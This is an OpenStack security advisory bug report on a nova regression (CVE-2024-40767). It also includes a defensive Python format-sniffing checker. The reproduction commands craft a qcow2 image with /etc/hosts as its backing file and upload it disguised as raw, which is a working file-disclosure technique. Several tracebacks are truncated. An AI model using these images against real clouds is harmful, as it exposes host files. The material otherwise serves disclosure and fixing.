[OSSA-2024-002] Incomplete file access fix and regression for QCOW2 backing files and VMDK flat descriptors (CVE-2024-40767)
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
OpenStack Compute (nova) | Fix Released | Critical | Unassigned |
OpenStack Security Advisory | Fix Released | High | Jeremy Stanley |
Bug Description
When fixing bug #2059809, a regression of the previous bug #1996188 has been introduced.
TLDR: nova is allowing back VMDK with wrong types and QCOW with backing files.
Long:
The following steps were used to reproduce on a Bobcat (2023.2) OpenStack + nova patches for bug #2059809 (not yet merged when writing this report).
Create a vmdk file:
$ qemu-img create -f vmdk disk-vmdk.vmdk 1M -o subformat=
$ sed -i -r 's|disk-
Create a faulty qcow image:
$ qemu-img create -f qcow2 -F raw -b /etc/hosts disk-bf.qcow2 1M
Upload both images as raw (the default)
$ for i in disk-bf.qcow2 disk-vmdk.vmdk ; do openstack image create --file $i $i ; done
Boot an instance from those images:
$ openstack server create --flavor small --image disk-vmdk.vmdk --net public disk-vmdk.vmdk
$ openstack server create --flavor small --image disk-bf.qcow2 --net public disk-bf.qcow2
Results
=======
VMDK monolithicFlat
-------------------
Traceback (most recent call last):
File "/usr/lib/
self.
File "/usr/lib/
created_
File "/usr/lib/
created_disks = self._create_
File "/usr/lib/
self.
File "/usr/lib/
image.
File "/usr/lib/
self.
File "/usr/lib/
copy_
File "/usr/lib/
return f(*args, **kwargs)
File "/usr/lib/
self.
File "/usr/lib/
disk.
File "/usr/lib/
processutil
File "/usr/lib/
raise ProcessExecutio
oslo_concurrenc
Command: qemu-img resize /var/lib/
Exit code: 1
Stdout: ''
Stderr: "qemu-img: Could not open '/var/lib/
Qemu tried to read /etc/hosts. My system permissions prevented it, but nova did nothing about it: wrong.
QEMU Backing File
-----------------
Traceback (most recent call last):
File "/usr/lib/
self.
File "/usr/lib/
self.
File "/usr/lib/
with excutils.
File "/usr/lib/
self.
File "/usr/lib/
raise self.value
File "/usr/lib/
guest = self._create_guest(
File "/usr/lib/
guest.
File "/usr/lib/
with excutils.
File "/usr/lib/
self.
File "/usr/lib/
raise self.value
File "/usr/lib/
return self._domain.
File "/usr/lib/
result = proxy_call(
File "/usr/lib/
rv = execute(f, *args, **kwargs)
File "/usr/lib/
six.reraise(c, e, tb)
File "/usr/lib/
raise value
File "/usr/lib/
rv = meth(*args, **kwargs)
File "/usr/lib/
raise libvirtError(
libvirt.
In libvirtd journalctl:
Jul 02 20:22:44 compute-1 libvirtd[959438]: internal error: Child process (LIBVIRT_
Here it's apparmor that prevented the boot, but nova should have caught it: wrong.
Expected results
----------------
Nova should raise an exception like it did previously.
E.G. for VMDK: nova.exception.
CVE References
description: updated
Changed in ossa:
status: New → Incomplete
summary: Regression VMDK/qcow arbitrary file access → Regression VMDK/qcow arbitrary file access (CVE-2024-40767)
summary: Regression VMDK/qcow arbitrary file access (CVE-2024-40767) → Incomplete file access fix and regression for QCOW2 backing files and VMDK flat descriptors (CVE-2024-40767)
summary: Incomplete file access fix and regression for QCOW2 backing files and VMDK flat descriptors (CVE-2024-40767) → [OSSA-2024-002] Incomplete file access fix and regression for QCOW2 backing files and VMDK flat descriptors (CVE-2024-40767)
description: updated
information type: Private Security → Public Security
Changed in ossa:
importance: Undecided → High
assignee: nobody → Jeremy Stanley (fungi)
This patch removes the explicit format passed to qemu-img in favor of a comparison with format_inspector after the fact. This means we still get a "sniff test" of what qemu thinks the image is, to catch things that are masquerading as raw images but contain more complex formats inside that qemu may later try to interpret. It's yet another compromise in front of the real fix we need, which is a refactor of the whole image backend system to make this comprehensively better.
I'll let Arnaud speak officially for himself, but I received feedback from him that this squashes the known cases of this bug already.
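The "sniff test" described in the comment above, as an added example that is not Nova's code nor the patch under discussion: a small Python checker that identifies the container from the file header instead of trusting the declared format, then rejects a QCOW2 that carries a backing-file reference and a VMDK whose descriptor createType is not on an allow-list. The allow-list, the helper names and the constructed sample headers are this example's own assumptions.

```python
import re
import struct

QCOW2_MAGIC = b"QFI\xfb"
VMDK_MAGIC = b"KDMV"
# Allow-list chosen for this example (not Nova's): flat descriptor types name a separate extent file.
ALLOWED_VMDK_TYPES = {"monolithicSparse", "streamOptimized"}

def sniff_format(data: bytes) -> str:
    """Detect the container from its header, ignoring whatever format the upload claimed."""
    if data[:4] == QCOW2_MAGIC:
        return "qcow2"
    if data[:4] == VMDK_MAGIC or data.lstrip().startswith(b"# Disk DescriptorFile"):
        return "vmdk"
    return "raw"

def vmdk_descriptor(data: bytes) -> str:
    """Text descriptor: embedded after a sparse header, or the whole file for flat images."""
    if data[:4] == VMDK_MAGIC and len(data) >= 44:
        # Sparse header (LE): magic, version, flags, capacity, grainSize, descriptorOffset, descriptorSize (sectors).
        _, _, _, _, _, off, size = struct.unpack_from("<4sIIQQQQ", data, 0)
        return data[off * 512:(off + size) * 512].decode("ascii", "replace")
    return data.decode("ascii", "replace")

def check_image(data: bytes, declared_format: str = "raw"):
    """Return None if the image is safe to hand to qemu-img, else the reason to reject it."""
    detected = sniff_format(data)
    if detected != declared_format:  # a 'raw' upload that is really qcow2/vmdk is the masquerade
        return f"declared {declared_format!r} but detected {detected!r}"
    if detected == "qcow2" and len(data) >= 20:
        # QCOW2 header (big-endian): magic, version, backing_file_offset, backing_file_size.
        _, version, bf_offset, bf_size = struct.unpack_from(">4sIQI", data, 0)
        if bf_offset or bf_size:
            return f"qcow2 v{version} image references a backing file"
    if detected == "vmdk":
        m = re.search(r'createType="([^"]+)"', vmdk_descriptor(data))
        create_type = m.group(1) if m else None
        if create_type not in ALLOWED_VMDK_TYPES:
            return f"vmdk createType {create_type!r} is not allowed"
    return None

# Constructed sample inputs (not real disk images): minimal headers and descriptors only.
def qcow2_header(backing_file: bytes = b"") -> bytes:
    hdr = struct.pack(">4sIQI", QCOW2_MAGIC, 3, 104 if backing_file else 0, len(backing_file))
    return hdr.ljust(104, b"\0") + backing_file  # backing-file name sits right after the header

def descriptor(create_type: bytes) -> bytes:
    return b'# Disk DescriptorFile\nversion=1\ncreateType="' + create_type + b'"\n'
def sparse_vmdk(create_type: bytes) -> bytes:
    hdr = struct.pack("<4sIIQQQQ", VMDK_MAGIC, 1, 3, 2048, 128, 1, 1)  # descriptor at sector 1
    return hdr.ljust(512, b"\0") + descriptor(create_type).ljust(512, b"\0")
```

Both reproduction cases from the report map onto this check: a QCOW2 with `-b /etc/hosts` fails on the backing-file fields, and a monolithicFlat descriptor fails on createType, whether or not the upload was declared raw.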